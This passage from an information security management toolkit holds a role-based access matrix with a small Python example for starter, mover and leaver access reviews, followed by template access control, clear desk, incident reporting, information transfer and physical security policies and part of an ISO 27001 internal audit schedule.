organization, represents the baseline access that can be pre-authorized by the business and that can be used to ensure that, during the
starters and leavers process, new users only get access to the assets and resources required for their role.
Further enhancements to this template can be made by also including privileges authorized for each role.

Assets (columns, to be marked against each role):
Comms Room, Website Source Code, Head Office Building, Distribution Centres, Customer Feedback,
Payroll Information, Staff Screening Records, Web Servers, Training Material, Internal Audit Reports

Roles (rows):
CEO
Head of Information Security
Compliance Director
HR Director
IT Director
Payroll Manager
Learning & Development Manager
Web Development Manager
IT Operations Manager
Internal Auditor
Payroll Officer
Trainer
Developer
Tester
Firewall Administrator
Database Manager
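To show how a matrix of this shape is used in practice, the Python below is an added example (it is not part of the BSI course toolkit). It encodes a role-to-asset baseline, derives the grants for a starter, the revoke/grant/re-level changes for a mover, the full revocation for a leaver, and an access-review check that flags grants exceeding the baseline. The role and asset names are those listed in the matrix above; the permission entries and the R/RW/A level scheme (A being the privileged level the toolkit suggests adding) are constructed for illustration and are not the course's answers.

```python
"""Baseline access matrix for a starters/movers/leavers process (added example)."""
from __future__ import annotations

from typing import Dict, Mapping, Set, Tuple

# Access levels used in this example: "R" read, "RW" read and write,
# "A" administer. "A" is treated as privileged.
LEVEL_RANK: Dict[str, int] = {"R": 1, "RW": 2, "A": 3}
PRIVILEGED_LEVELS = {"A"}

# Constructed baseline (an assumption, not the course's answers): the access a
# role is pre-authorized to receive, keyed role -> asset -> level.
BASELINE: Dict[str, Dict[str, str]] = {
    "CEO": {"Head Office Building": "R", "Customer Feedback": "R",
            "Internal Audit Reports": "R"},
    "HR Director": {"Head Office Building": "R", "Payroll Information": "RW",
                    "Staff Screening Records": "RW", "Training Material": "RW"},
    "Payroll Officer": {"Head Office Building": "R", "Payroll Information": "RW"},
    "Internal Auditor": {"Head Office Building": "R", "Payroll Information": "R",
                         "Internal Audit Reports": "RW"},
    "Developer": {"Head Office Building": "R", "Website Source Code": "RW"},
    "Tester": {"Head Office Building": "R", "Website Source Code": "R"},
    "Firewall Administrator": {"Head Office Building": "R", "Comms Room": "R",
                               "Web Servers": "A"},
}


def baseline_for(role: str) -> Dict[str, str]:
    """Return a copy of the pre-authorized access for a role (empty if unknown)."""
    return dict(BASELINE.get(role, {}))


def starter_grants(role: str) -> Dict[str, str]:
    """Starter: grant exactly the baseline for the role, nothing more."""
    return baseline_for(role)


def mover_changes(
    old_role: str, new_role: str
) -> Tuple[Dict[str, str], Dict[str, str], Dict[str, Tuple[str, str]]]:
    """Mover: what to revoke, what to grant and what to re-level on a role change.

    Returns (revoke, grant, relevel); relevel maps asset -> (old level, new level).
    """
    old = baseline_for(old_role)
    new = baseline_for(new_role)
    revoke = {a: lvl for a, lvl in old.items() if a not in new}
    grant = {a: lvl for a, lvl in new.items() if a not in old}
    relevel = {a: (old[a], new[a]) for a in old.keys() & new.keys() if old[a] != new[a]}
    return revoke, grant, relevel


def leaver_revocations(actual: Mapping[str, str]) -> Set[str]:
    """Leaver: every current grant is revoked, whatever the baseline says."""
    return set(actual)


def excess_access(role: str, actual: Mapping[str, str]) -> Dict[str, str]:
    """Periodic access review: grants that exceed the role's baseline.

    An asset is flagged when the role has no baseline entry for it, or when the
    actual level ranks above the baseline level.
    """
    base = baseline_for(role)
    findings: Dict[str, str] = {}
    for asset, level in actual.items():
        allowed = base.get(asset)
        if allowed is None or LEVEL_RANK[level] > LEVEL_RANK[allowed]:
            findings[asset] = level
    return findings


def privileged_assets(role: str) -> Set[str]:
    """Assets for which the role's baseline includes a privileged level."""
    return {a for a, lvl in baseline_for(role).items() if lvl in PRIVILEGED_LEVELS}


if __name__ == "__main__":
    # Constructed scenario: a Tester moves into the Developer role.
    print("mover:", mover_changes("Tester", "Developer"))
    # Constructed review input: a Tester who kept write access and gained payroll read.
    print("review findings:", excess_access(
        "Tester", {"Head Office Building": "R", "Website Source Code": "RW",
                   "Payroll Information": "R"}))
```

The review function is the part worth keeping in a real process: comparing actual grants against the pre-authorized baseline is what turns the matrix from a one-off onboarding aid into the periodic access-rights review the access control policy below calls for.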
Toolkit (Access control policy)
Access control policy
Objectives
To define the policy requirements for logical and physical access to ABC Organization Ltd’s
information and information processing facilities.
To limit access to and provide appropriate administration controls over access by users to
ABC Organization Ltd’s information and information processing facilities, including but not
limited to systems, applications, documented information, business processes and sites
Scope
The Access Control Policy applies to all ABC Organization Ltd’s information and information
processing facilities.
Policy
It is the policy of ABC Organization Ltd that:
• Access must be granted and maintained on a need-to-know principle
• Access must be granted in a manner that maintains:
  – The confidentiality, integrity and availability of information assets
  – Compliance with legislation
  – A balance between control and business need
  – An infrastructure which facilitates data sharing without sacrificing the security of
    information services
Access to information
• Access to information must be restricted to authorized staff, partners and suppliers.
All information assets must be owned by an individual within ABC Organization Ltd.
Information owners must classify their owned assets in accordance with the [information
classification, handling and protection] policy. Information owners must ensure or assist in
the development of appropriate access control rules, access rights and restrictions for
specific user roles in relation to their owned assets, in compliance with any applicable
[internal] [segregation of duties] controls. Information owners must authorize staff requiring
access to information assets owned by them.
Access levels must be verified by information owners before access is approved. All supplier
access must be authorized by the information owner and, if necessary, monitored.
Subject: Access control policy | Effective Date: | Document Type: Policy | Version: | Owner: | Authorized by: | Next Review: | Page: 1 of 3
All access requests must be made in writing by [line managers]. Information owners must
not be permitted to act as both access requestor and approver.
Access administration roles must be segregated and must not be permitted to both approve
and grant access. Any identified role conflicts must be reported to the [Information Security
Manager].
Access administration records must be maintained.
Access must not be provided through generic or shared user accounts.
All passwords used to access information must conform to ABC Organization Ltd’s
requirements relating to password composition, length, expiry date and confidentiality.
Passwords allocated by system administrators must be configured to require changing by
the authorized user upon first login.
Information systems deemed critical by the information owner must be monitored to detect
non-compliance and records of evidence collected in case of security access events. The
level of monitoring required for individual systems and facilities must be defined by the
information owner.
Access rights must be periodically reviewed by the [Information Security Management
Committee] in accordance with the [Information Classification Scheme].
Access to information assets must be amended or removed when staff change roles.
Access to information assets must be revoked immediately upon termination of
employment.
Privileged access
Staff requiring privileged access to ABC Organization Ltd’s information and supporting
assets, e.g. IT administrators or system developers, must be specifically authorized to be
granted such access by the IT Manager or his delegates.
Staff with access to systems under development must not also have access to the live
system. Should access to live systems be required it must be specifically authorized, be
aligned with a specific reason and be limited in duration. Access to live systems and/or data
must be read only.
The segregation of responsibilities in respect of IT staff must be supported by the access
levels assigned.
Staff must not use system accounts such as ‘Administrator’ to access IT systems or
infrastructure; access must be made using individually assigned accounts.
Access to ABC Organization Ltd buildings
Access to ABC Organization Ltd’s offices [and operational sites], and disaster recovery
buildings, must be controlled on a ‘need to access’ basis only.
Visitors must sign in before entering ABC Organization Ltd’s premises and sign out upon
leaving. Whilst in ABC Organization Ltd premises, they must be accompanied at all times.
Access to the company’s offices must be revoked immediately upon termination of
employment and any access token returned.
Responsibilities
All staff must comply with this access control policy.
The [facilities management function] must develop, publish, and maintain building and
physical security procedures and standards to support the achievement of compliance with
this policy. The [IT function] must develop, publish, and maintain IT procedures and
standards to support the achievement of compliance with this policy.
All [managers] must be responsible for implementing the policy within their areas of
responsibility.
All [information owners] must be responsible for defining access rights by role for all the
information and supporting systems within their remit.
Consequences of non-compliance
Any breaches of this policy by employees may result in disciplinary action being taken
under ABC Organization’s disciplinary process. Non-compliance by contracted third parties
or their employees may result in termination of the supplier’s contract.
Policy review and maintenance
This access control policy must be reviewed annually by the policy owner or [Information
Security Management Committee] to ensure it remains fit for purpose.
Change history
Issue 1 – XX Month 20XX – First published
Toolkit (Clear desk and clear screen policy)
Clear desk and clear screen policy
Objective
The objective of this clear desk and clear screen policy is to ensure that the information
and information processing facilities of ABC Organization Ltd are adequately protected by a
combination of logical and physical controls.
Scope
This clear desk and clear screen policy applies to all employees that use information and
information processing facilities irrespective of whether they are office based or work
remotely.
Policy
It is ABC Organization Ltd’s policy to ensure that all company and customer information,
whether in electronic or hardcopy format, must be appropriately secured at all times.
This clear desk and clear screen policy is approved by, and has the full support of, the
Directors of ABC Organization Ltd.
Outside normal working hours, all confidential information, whether marked or not, must
be secured in accordance with ABC Organization Ltd’s Information Security Classification
Policy. During office hours such information must be concealed if desks are to be left
unattended for long periods.
All staff must protect the confidentiality of information by ensuring their computer is
protected by a password-enabled screensaver when they are away from their desk.
Outside normal working hours, mail must not be left on desks and unopened mail in mail
trays must be locked away.
When it is to be disposed of, all customer and ABC Organization Ltd classified information
must be placed in an approved confidential waste container or shredded.
All documents must be immediately retrieved from printers, photocopiers and fax
machines. Staff handling hardcopies of ABC Organization Ltd internal or customer
information must take appropriate steps to ensure their protection.
Those in charge of meetings must ensure that no confidential information is left in meeting
rooms.
At night, all computers must be logged off unless required to remain on for operational
purposes.
Laptops, mobile telephones, swipe cards and other portable assets must be locked away
when left unattended for extended periods.
When working remotely all reasonable steps must be taken to protect hardware assets by
using additional physical or logical security measures, e.g. Kensington locks or PIN
numbers. Special care must be applied to mobile devices, e.g. laptops, smart phones and
USB storage devices.
Responsibilities
The Directors of ABC Organization Ltd must ensure that the principles of this policy are
implemented.
All staff must comply with this clear desk and clear screen policy at all times and whenever
their desk is left unattended.
Consequences of non-compliance
Any breaches of this policy by employees may result in disciplinary action being taken
under ABC Organization Ltd’s Disciplinary Process. Non-compliance by contracted third
parties or their employees may result in termination of the supplier’s contract.
Policy review and maintenance
This Clear Desk and Clear Screen Policy must be reviewed annually and at other times as
dictated by operational needs.
Change history
Issue 1, XX Month 20XX: First published
Toolkit (Information security incident reporting and management policy)
Information security incident reporting and management policy
Objectives
To define the policy requirements to ensure information security incidents are reported and
managed effectively within ABC Organization Ltd.
The objective of the information security incident reporting and management policy is to
ensure that information security incidents are reported and managed in an appropriate
manner and that recovery is completed in a timely manner with minimal impact on the
Organization.
Scope
This policy covers the requirement to ensure that all information security events and
weaknesses are reported in a timely manner and dealt with in accordance with defined
escalation processes.
Definitions
Information asset – Any information and information processing assets of value to ABC
Organization Ltd.
Information owner – Individual accountable for the information asset.
Incident – Any situation that could lead to a disruption to ABC Organization Ltd’s operation.
Information security incident – Identified occurrence of a system, service or network
state indicating a possible breach of the [Information Security] Policy or failure of controls,
or a previously unknown situation that may be security relevant.
Information security event – Single or a series of unwanted or unexpected information
security events that have a significant probability of compromising business operations and
threatening information security.
Weakness – A vulnerability identified in controls, systems or networks that could lead to
compromise of ABC Organization Ltd’s business operations.
Information security weakness – A vulnerability identified in information security
controls, systems or networks.
Reportable incident – A reportable security incident is an event or weakness that
contravenes or could contravene the policies, processes and procedures that are part of the
information security management system (ISMS).
Policy
It is the policy of ABC Organization Ltd that:
- All staff and suppliers must be aware of the requirements for reporting incidents and
weaknesses and must adhere to the processes set out in this document
- All information security incidents and weaknesses are logged in a timely manner
- Appropriate action is taken to reduce the impact of an information security incident
- [IT function], [HR Function] and [Facilities Function] must monitor, analyse and
report on events to determine any changes in risks affecting the confidentiality,
integrity and availability of information assets
Reporting information security events and incidents
All incidents should be reported to IS Support, who must then escalate the incident to the
appropriate team. Security related incidents must be brought to the attention of the
Information Security Team who must assess the severity and potential impact of the
incident.
An incident is defined as any event that affects or threatens the confidentiality, integrity or
availability of information. In other words, an incident is any event that implies harm or the
attempt to harm.
All information security incidents and weaknesses must be reported immediately to the
relevant [Information Security Manager] initially verbally and then followed up with the
completion of an Incident Report ([Incident Form]).
Contact details of the [Information Security Manager] must be published on the [Portal].
All staff must be made aware of their responsibility to report any information security events
and the process for doing so.
The [IT Function] must review and monitor all issues reported via the [Helpdesk/Support
Function] and identify possible information security incidents, events and weaknesses.
These events and incidents must be reported directly to the [Information Security Manager].
The [Facilities Function] must review and monitor all security and building issues reported
via their Helpdesk/Support Function and identify possible information security incidents,
events and weaknesses. These events and incidents must be reported directly to the
[Information Security Manager].
Suitable feedback processes must be followed to ensure that those reporting information
security events are notified of results after the issue has been dealt with and closed.
The [Information Security Manager] must maintain a process for recording and addressing
reported events. This process must include the ability to classify them.
Where appropriate the incident needs to be escalated to the appropriate authority. The
Information Security Team must maintain a list of all the relevant authorities and their
contact details.
Standard information security event reporting records must be created to support the
reporting action and to facilitate the collection of all relevant information.
Prior to reporting the event, staff must note all important details but must not take any action
of their own, for whatever purpose and however well intentioned.
Staff who are found to be involved with security breaches must be dealt with in accordance
with ABC Organization Ltd’s disciplinary process.
Processes used by the [Information Security Manager] must ensure that any evidence is
collected as soon as possible after the security event.
Learning from security events, incidents and weaknesses
Information security incident reporting and recording mechanisms must enable the types,
volumes and costs of information security incidents to be analysed.
The information gained from the analysis of information security incidents must be used to
identify recurring or high impact incidents.
The analysis of information security incidents must indicate the need for enhanced or
additional controls to limit the frequency, damage and cost of future occurrences, or to be
taken into account in the security policy review process.
Collection of evidence
Where a follow-up action against a person or organization after an information security
incident involves legal action (either civil or criminal), evidence should be collected, retained,
and presented to conform to the rules for evidence laid down in the relevant jurisdiction(s).
ABC Organization Ltd must make available appropriate facilities for collecting and
presenting evidence for the purposes of disciplinary action carried out within ABC
Organization Ltd.
ABC Organization Ltd’s [Legal Function] must provide advice on the rules for evidence that
apply in any given situation and any actions that need to be taken where the incident is
cross border into other jurisdictions.
Any forensics work must be performed on copies of the evidential material. The integrity of
all evidential material must be protected.
Evidential material must be collected under dual control by trustworthy individuals.
A record must be maintained of when and where the collection process was executed, who
performed the collection activities and which tools and programs were used.
ABC Organization Ltd’s [Legal Function] must be involved in the early stages of any
investigation in order to assess whether legal action may ensue and, hence, what evidence
is required.
Incident responses
Systems, alerts and vulnerabilities must be monitored as a further method of detecting
information security incidents.
ABC Organization Ltd’s priorities for handling information security incidents must be
established.
[Help desk] processes to handle different types of information security incident must include:
- Information system failures and loss of service
- Malicious code infiltration
- Denial of service attacks
- Errors
- Breaches of confidentiality and integrity
- Inappropriate use of information processing facilities
Additionally, the processes must address the need for:
- Investigating and recording the cause of the incident
- Containment
- Planning and implementation of corrective action to prevent recurrence, if necessary
- Communication with those affected by or involved with recovery from the incident
- Reporting the action to an appropriate authority such as the police
- Audit trails and similar evidence to be collected and secured
Actions to recover from security breaches and correct system failures must be carefully and
formally controlled.
Responsibilities
ABC Organization Ltd’s [Information Security Manager] must be responsible for ensuring
that:
- Formal event reporting and escalation processes are developed and maintained
- All staff are made aware of the processes for reporting the different types of event
and weakness that might have an impact on the security of ABC Organization Ltd’s
assets
[IT Function] must be responsible for monitoring IT issues and identifying and reporting
information security incidents and weaknesses.
[Facilities Function] must be responsible for monitoring building and physical security issues
and identifying and reporting information security incidents and weaknesses.
All staff must be responsible for reporting any information security events and weaknesses
as quickly as possible to the [Information Security Manager].
Suppliers must be responsible for supporting and delivering these processes and for reporting
incidents and weaknesses in a timely manner through a formal and agreed reporting process.
Consequences of non-compliance
Any breaches of this policy by employees may result in disciplinary action being taken under
ABC Organization Ltd’s Disciplinary Process. Non-compliance by contracted third parties or
their employees may result in termination of the supplier’s contract.
Policy review and maintenance
This information security incident reporting and management policy must be reviewed
annually by the policy owner or [Information Security Forum] to ensure it remains fit for
purpose.
Change history
Issue 1, XX Month 20XX: Initial draft
Toolkit (Information transfer policy)
Information transfer policy
Objectives
To define the policy requirements in relation to the maintenance of the security of
information transferred between ABC Organization Ltd and any third party.
The objectives of this information transfer policy are to ensure that:
- Information is only exchanged with third parties with which there is an agreement in
place
- Information transfer agreements remain appropriate and relevant
Scope
The scope of this information transfer policy applies to all information transferred with clients
and other third parties that provide goods or services to ABC Organization Ltd.
Policy
ABC Organization Ltd exchanges information with a range of external individuals and
organizations. Its policy on such exchanges is that:
- Staff tasked to carry out transfers of information must be fully trained and experienced
and have full and explicit instructions as to the type and nature of the information being
transferred and how the transfer is to be effected
- Prior to sharing information with external organizations a formal agreement or contract
must be in place to govern the specific requirements for security appropriate for that
information exchange
- Principles must be maintained which outline the requirements for secure transmission of
information
Should any member of staff have any doubt as to how they are to exchange information,
they must seek advice from their line manager.
Information received from customers in hard copy must be protected at all times and either
returned to the customer when no longer required or securely destroyed.
Responsibilities
ABC Organization Ltd must ensure that this policy is complied with through regular auditing.
Staff that exchange information with clients or other third parties must be accountable for
compliance with this policy.
Consequences of non-compliance
Any breaches of this policy by employees may result in disciplinary action being taken under
ABC Organization Ltd’s Disciplinary Process. Non-compliance by contracted third parties or
their employees may result in termination of the supplier’s contract.
Policy review and maintenance
This information transfer policy must be reviewed annually by the policy owner or
[Information Security Committee] to ensure it remains fit for purpose.
Change history
Issue 1, XX Month 20XX: Initial draft
Toolkit (Physical and environmental security policy)
Physical and environmental security policy
Objectives
To define the policy requirements for ensuring the prevention of unauthorized physical
access, damage and interference to ABC Organization Ltd’s information and information
processing facilities.
The objective of the Physical and Environmental Security Policy is to define the requirements
for physical security controls that must be applied at all ABC Organization Ltd sites.
Confidential ABC Organization Ltd business information processing facilities should be housed
in secure areas, protected by a defined security perimeter, with appropriate security barriers
and entry controls. They should be physically protected from unauthorized access, damage
and interference.
The protection provided should be aligned with the identified risks.
Scope
This policy is first issued on [dd mmmmm yyyy] and must be fully implemented by [dd
mmmmm yyyy].
The scope of this policy is all physical ABC Organization Ltd sites holding information assets,
including:
- ABC Organization Ltd area in [List Location]
- Head Office site in [location], where data centre is located
- BCM site where backup data centre is located
All [Supplier] sites holding ABC Organization Ltd information and providing services to ABC
Organization Ltd are required to comply with this Policy.
- Management and maintenance of security processes and procedures
Policy
It is the policy of ABC Organization Ltd that secure areas must be protected by appropriate
entry controls to ensure that only authorized personnel are allowed access. The following
principles underline physical security within ABC Organization Ltd.
Physical security
Perimeter
Based on the results of risk assessments, perimeter controls must be implemented to
protect areas that contain information assets and information processing facilities.
The following controls must be considered and implemented:
- The walls of buildings or secure areas containing information processing facilities
must be physically sound to protect against unauthorized access
- All doors, windows, gates and other access points to buildings must be protected with
secure locks and catches of an approved standard. These devices must be
maintained in good working order and records kept of all key holders and of those
who have access to keys
- Doors and windows must be locked when unattended
- Sites must be protected with prevention (e.g. barriers to restrict access by vehicles)
and detection controls (e.g. CCTV) to deter intruders, vandals, etc. and to provide a
means of retrieving relevant information should an incident occur
- A manned reception area must control physical access to the building
- Access to sites and buildings must be restricted to authorized employees
- All fire doors on security perimeters must be alarmed, monitored, tested and operate
in a failsafe manner
- Intruder detection systems must be installed to protect unoccupied areas, including
communications rooms, and regularly tested to cover all external doors and
accessible windows
External parties requiring access to secure areas, such as information processing facilities,
must be subject to the terms and conditions of a written contract expressed in legally
enforceable language.
Information processing facilities must be protected by layered physical and environmental
controls to provide ABC Organization Ltd with defence in depth and avoid single points of
failure.
The primary function of CCTV cameras must be the protection of ABC Organization Ltd
assets. The cameras must be used, where possible, to offer some protection to employees’
property, although this is a secondary function. Systems must be reviewed at regular
intervals to ensure they are still appropriate for the task (e.g. checking that recorded footage
covers the correct area and enables individuals to be identified) and modified to reflect any
changes to the building or areas covered by the cameras.
Physical entry controls
Access to all sites must be controlled by either electronic keypad or swipe/proximity card
reader which must be located at all entry and exit points of the building, excluding exits
designated for emergency use only.
Access rights to secure areas must be regularly reviewed and updated.
Access cards
All personnel authorized to access secure areas must be visibly identifiable.
Security identity badges must be issued to all employees, visitors, contractors, temporary
employees and any other person who needs access to each site for any reason, without
exception, other than members of the emergency services.
In buildings where a swipe/proximity card access control system is used, the employee’s
access card may double as the security identity badge.
Badges issued to employees must display the name of the employee and, where possible,
their photograph.
Employees must report the loss or suspected loss of any access card to the [Facilities
Management Function] immediately. The access card must be suspended immediately and
must be re-activated on return of the temporary pass issued.
Disciplinary measures must be taken in any case where identification badges or access
cards are misused.
When employees leave the company, their identity badges and access cards must be
returned to [their line manager] and de-activated immediately.
Management of keypad systems
[Describe when keypads are used ...............]
When employees leave the company, their access key code must be deleted immediately.
Where common access key codes are in operation, the code must be changed every two
months and when employees leave the company.
Visitor access
The date and time of entry and departure of visitors must be recorded.
Visitors of the ABC Organization Ltd sites must only be granted access to ABC Organization
Ltd facilities on invitation by ABC Organization Ltd in advance.
Reception and the security guards must be informed in advance of all planned visits.
Visitors must be:
- Accompanied from and to reception
- Issued with a temporary badge which clearly identifies them as a visitor, giving their
name, the company they represent and an expiry date, which must be worn by the
visitor and remain visible
- Supervised at all times, unless their access has been approved [by or through the]
[temporary access authorization process], the visitor has been issued with a
temporary access card, and they have been given instructions on ABC Organization Ltd’s
security requirements and emergency procedures
Communication rooms and data centres
Physical access to all communications rooms and data centres must be controlled and
restricted to authorized persons approved by the [Information Security Manager].
Authentication controls must be used to authorize and validate all access.
A ‘record of entry’ log book must be maintained to establish an audit trail of all accesses to
communications rooms and data centres.
Access rights to communications rooms and data centres must be:
- Reviewed and updated or revoked when necessary
- Updated when employees leave or change roles and responsibilities
The [Facilities Management Function] must be responsible for maintaining appropriate
environmental conditions in ABC Organization Ltd’s computer installations. Environmental
conditions, such as temperature and humidity, must be monitored in communications rooms.
Rooms housing critical IT facilities must be:
- Free from intrinsic fire hazards, such as stored paper or chemicals
- Fitted with serviced fire detection and suppression systems that are tested
periodically
Securing offices, rooms and facilities
A secure area may be a locked office or several rooms inside a physical security perimeter,
which may be locked and may contain lockable cabinets or safes. The selection and design
of a secure area must take into account the possibility of damage from fire, flood, explosion,
civil unrest, and other forms of natural or man-made disaster.
Account must also be taken of relevant health and safety regulations and standards.
Physical security for offices, rooms and facilities must be designed and the following applied:
- Health and safety regulations must be complied with
- Key operational activities must be sited to avoid unauthorized access
- Signage must not be used to identify the location of information processing facilities
- Directories and internal telephone books must be subject to ABC Organization Ltd’s
clear desk requirements, which can be found in the [acceptable use] policy and
[information classification, handling and protection] policy
- Consideration must be given to any security threats presented by neighbouring
premises, other surrounding activities, equipment and storage of hazardous
substances
- Lockable cabinets, cupboards or drawers as appropriate must be provided for each
employee in order for them to keep information appropriately secured while they
carry out their duties
Working in secure areas
Employees must only be aware of the existence of, or activities within, a secure area on a
need to know basis.
Procedures must be put in place to ensure that unsupervised working in secure areas is
avoided, both for health and safety reasons and to prevent opportunities for malicious
activities.
Unsupervised working in communications rooms or data centres must be permitted only with
the support of compensating controls (e.g. a maintenance engineer may be subject to a
formal contract) and must be agreed in advance by the ABC Organization Ltd [Information
Security Manager].
Vacant secure areas must be locked and periodically checked.
Additional controls and guidelines may be required to enhance the security of a secured
area. This includes controls for the personnel of [supplier]s working in the secured areas, as
well as [supplier] activities taking place there.
Public access, delivery and loading areas
External access points must be controlled and, if possible, isolated from information
processing facilities to avoid unauthorized access.
Security requirements for these areas must be determined by a risk assessment. A delivery
or loading procedure must be in place to regulate these activities.
Access to the delivery and loading area must be controlled by personnel, in order that
supplies can be unloaded without delivery personnel gaining unauthorized access to other
parts of the building.
Access to the external doors of a delivery and loading area must be controlled by suitable
means when the internal doors are opened.
Incoming material deemed to be a potential threat must undergo necessary inspections
before this material is moved from the delivery and loading area to the point of use.
Incoming material must be registered in accordance with asset management processes
operated by ABC Organization Ltd.
Protecting against physical and environmental threats
Physical and environmental security controls must be designed and applied to protect against
damage from fire, flood, explosion and forms of natural or man-made disaster.
The security threats posed by neighboring premises must be considered in the design of the
physical and environmental security controls.
Standby information processing facilities and backup media must be sited at a distance
considered safe by the [Information Security Manager].
Fire detection and suppression equipment and installations must be provided based on the
findings of risk assessments.
Installation of any significant pieces of equipment or the introduction of new business
activities to any secure environment must be subject to (information security) risk assessment.
Controls must be adopted to minimize the risk of potential physical threats:
- Smoking must not be allowed in any ABC Organization Ltd building
- Lightning protection must be applied to buildings and lightning protection filters must
be fitted to all incoming power and communications lines
- Storage of hazardous materials must be subject to risk assessment and suitable
controls
- Environmental conditions, such as temperature and humidity, must be monitored in
communications rooms
Supporting utilities
Supporting utilities, such as electricity, water supply, sewage, heating/ventilation and air
conditioning must be:
- Fit for purpose
- Regularly inspected and, as appropriate, tested to ensure their proper functioning
and to reduce the risk of malfunction or failure
ABC Organization Ltd’s electrical supplies must conform to equipment manufacturer’s
specifications.
Business critical information processing equipment must be protected from power failures
and other electrical anomalies. Options to achieve continuity of power supplies include:
- An uninterruptible power supply (UPS) to support orderly close down of information
processing facilities in communications rooms
- A backup generator with an adequate supply of fuel must be available in the event of
power loss
- Multiple feeds to avoid a single point of failure in the power supply
Emergency power off switches must be located near exits in communications rooms.
Emergency lighting must be provided in case of mains power failure.
The need for an alarm system to detect malfunctions in the water supply or the ingress of
water must be evaluated on a regular basis by the [Facilities Manager] if there is a higher
than normal likelihood of contamination by water.
Equipment security, siting and protection
Equipment must be physically sited and/or physically protected to reduce security threats
and environmental hazards. Protection of equipment (including when used off site) is
necessary to reduce the risk of unauthorized access to data and to protect against loss or
damage. This must also consider equipment disposal.
Procedures must be put in place to ensure that mobile equipment containing confidential or
sensitive information is locked in a secure cabinet or vault when not in use.
Network equipment that operates in an unattended mode (e.g. servers, switches) must be
located in a secured room or facility accessible only by authorized ABC Organization Ltd
employees or authorized external persons. Essential information about hardware/software
must be recorded in an inventory.
Inventories must:
• Be protected against unauthorized change
• Be checked periodically against actual assets
• Be kept up to date
• Be independently reviewed
• Be uniquely identified
• Specify hardware or software versions
• Specify the location of hardware or software
Managers are responsible for ensuring that inventories are properly maintained.
Cabling security
Special controls may be required to protect against hazards or unauthorized access and to
safeguard supporting facilities, such as the electrical supply and cabling infrastructure.
Power and telecommunications cabling carrying data or supporting information services must
be protected from interception or damage.
Procedures must be in place to guarantee that power cables are segregated from
communication cables to prevent interference.
Power and telecommunications lines into information processing facilities must be
underground, where possible.
Network cabling must be protected from unauthorized interception or damage.
Cables must be colour coded and a documented patch list must be used to reduce the
possibility of errors.
Equipment maintenance
Equipment must be correctly maintained to ensure its continued availability and integrity.
Equipment must be maintained in accordance with the supplier’s recommended
specifications and service intervals.
Only contracted, authorized maintenance engineers must carry out repairs and service
equipment.
Records must be kept of all suspected or actual faults and all preventive and corrective
maintenance.
Appropriate controls must be implemented when equipment containing confidential materials
and information is maintained.
All requirements imposed by insurance policies taken out by ABC Organization Ltd must be
complied with.
Security of equipment off-premises
The security of equipment off premises must be equivalent to that for on-site equipment
used for the same purpose, taking into account the risks of working outside the
organization’s premises.
Security risks vary considerably between locations and must be taken into account in
determining the most appropriate controls.
Equipment and media taken off ABC Organization Ltd’s sites must not be left unattended in
public places; mobile devices must be carried as hand luggage and disguised where possible
when travelling.
Manufacturers’ instructions for protecting equipment must be observed at all times.
Adequate insurance cover must be in place to protect equipment off site.
Controls applied to equipment and media taken off ABC Organization Ltd’s sites must take
account of local circumstances.
Specific provisions for the security of equipment off-premises are made within the ABC
Organization Ltd [mobile device and teleworking] policy.
Secure disposal or re-use of equipment
The [IT function] within ABC Organization Ltd must check all items of equipment containing
storage media to ensure that any sensitive data and licensed software has been removed or
securely overwritten prior to disposal.
A disposal acknowledgement report from any chosen disposal services must be held
confirming the disposal of named assets and appropriate destruction of data and storage
devices.
Devices containing classified information must be physically destroyed or the information
must be destroyed, deleted or overwritten using techniques to make the original information
non-retrievable.
Damaged devices containing classified information must be dealt with in accordance with
ABC Organization Ltd’s [information classification, handling and protection] policy.
Removal of property
Information assets must not be taken off site without prior authorization from the
information owner.
[Highly confidential] information must not be taken off site other than as part of the transfer
process described in the [information classification, handling and protection] policy.
Information assets taken off site must be recorded in the asset register as removed off-site, so that their location is known.
Photography
Photography or filming of any type is not permitted on any ABC Organization Ltd premises
without the prior permission of the [Information Security Manager].
Responsibilities
All employees must comply with this [physical and environmental security] policy. Any
breach of this policy must be treated as an incident and may be dealt with in accordance
with ABC Organization Ltd’s disciplinary procedure as defined in the [Employee Handbook].
The ABC Organization Ltd [Information Security Manager] is responsible for
managing the information security policy, and for the identification, evaluation and treatment
of risks. The [Information Security Manager] must ensure that this Policy is communicated to
all employees and that they understand their responsibilities. The ABC Organization Ltd
[Information Security Manager] must ensure that all employees are provided with training in
support of this policy.
The [Facilities Management Function] is responsible for:
• Assisting the [Information Security Manager] in the identification and evaluation of risks relating to new and existing ABC Organization Ltd sites and sites holding ABC Organization Ltd’s information assets
• Physical security of premises including the provision of appropriate resources and physical security measures
• Management and maintenance of security processes and procedures
Consequences of non-compliance
Any breaches of this policy by employees may result in disciplinary action being taken under
ABC Organization Ltd’s Disciplinary Process. Non-compliance by contracted third parties or
their employees may result in termination of the supplier’s contract.
Policy review and maintenance
This [physical and environmental security] policy must be reviewed annually by the Policy
Owner or [Information Security Management Committee] to ensure it remains fit for
purpose.
Change history
Issue 1: XX Month 20xx, Initial draft
Toolkit
Information security internal audit schedule
Audit schedule
Clause 4 Context of the Organization
4.1 Understanding the organization and its context
4.2 Understanding the needs and expectations of interested parties
4.3 Understanding the scope of the information security management system
4.4 Information security management system
Clause 5 Leadership
5.1 Leadership and commitment
5.2 Policy
5.3 Organizational roles, responsibilities and authorities
Clause 6 Planning
6.1 Actions to address risks and opportunities
6.2 Information security objectives and planning to achieve them
Clause 7 Support
7.1 Resources
7.2 Competence
7.3 Awareness
7.4 Communication
7.5 Documented information
Clause 8 Operation
8.1 Operational planning and control
(Audit schedule columns for each row above and below: Year 1 Jul-20xx, Jan-20xx; Year 2 Jul-20xx, Jan-20xx; Year 3 Jul-20xx, Jan-20xx)
8.2 Information security risk assessment
8.3 Information security risk treatment
Clause 9 Performance evaluation
9.1 Monitoring, measurement, analysis and evaluation
9.2 Internal audit
9.3 Management review
Clause 10 Improvement
10.1 Nonconformity and corrective action
10.2 Continual improvement
A.5.1 Management direction for information security
A.5.1.1 Policies for information security
A.5.1.2 Review of the policies for information security
A.6.1 Internal organization
A.6.1.1 Information security roles and responsibilities
A.6.1.2 Segregation of duties
A.6.1.3 Contact with authorities
A.6.1.4 Contact with special interest groups
A.6.1.5 Information security in project management
A.6.2 Mobile devices and teleworking
A.6.2.1 Mobile device policy
A.6.2.2 Teleworking
A.7.1 Prior to employment
A.7.1.1 Screening
A.7.1.2 Terms and conditions of employment
A.7.2 During employment
A.7.2.1 Management responsibilities
A.7.2.2 Information security awareness, education and training
A.7.2.3 Disciplinary process
A.7.3 Termination and change of employment
